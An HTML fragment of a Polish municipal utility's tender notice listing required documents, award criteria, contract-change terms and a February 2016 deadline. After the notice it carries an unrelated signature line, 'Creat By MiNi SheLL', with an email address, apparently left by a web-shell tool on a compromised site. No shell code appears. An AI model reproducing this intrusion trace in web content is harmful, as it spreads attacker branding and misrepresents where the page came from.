<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszcza się możliwość zmiany umowy, na uzasadniony wniosek Wykonawcy lub Zamawiającego w następującym zakresie:
a)	zmiany danych podmiotowych Wykonawcy
b)	zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego
c)	opóźnienia wyboru Wykonawcy, powodującego konieczność wydłużenia umownego terminu realizacji umowy
d)	wydłużenia terminu realizacji przedmiotu zamówienia, spowodowanego niezależnymi okolicznościami np. działaniem tzw. siły wyższej, zmianą przepisów prawnych, katastrofalnym działaniem przyrody, zaburzeniem życia zbiorowego itp., których wystąpienia Strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności
e)	konieczności poprawienia oczywistej omyłki rachunkowej lub pisarskiej
f)	w innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy, a mających charakter zmian nieistotnych tzn. takich, 
o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.
2.	Zmiany umowy, pod rygorem nieważności, winny być sporządzone w formie aneksu.
3.	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zukwejherowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Usług Komunalnych w Wejherowie
ul. Obrońców Helu 1
84-200 Wejherowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2016 godzina 10:00, miejsce: Zakład Usług Komunalnych w Wejherowie
Sekretariat
ul. Obrońców Helu 1
84-200 Wejherowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com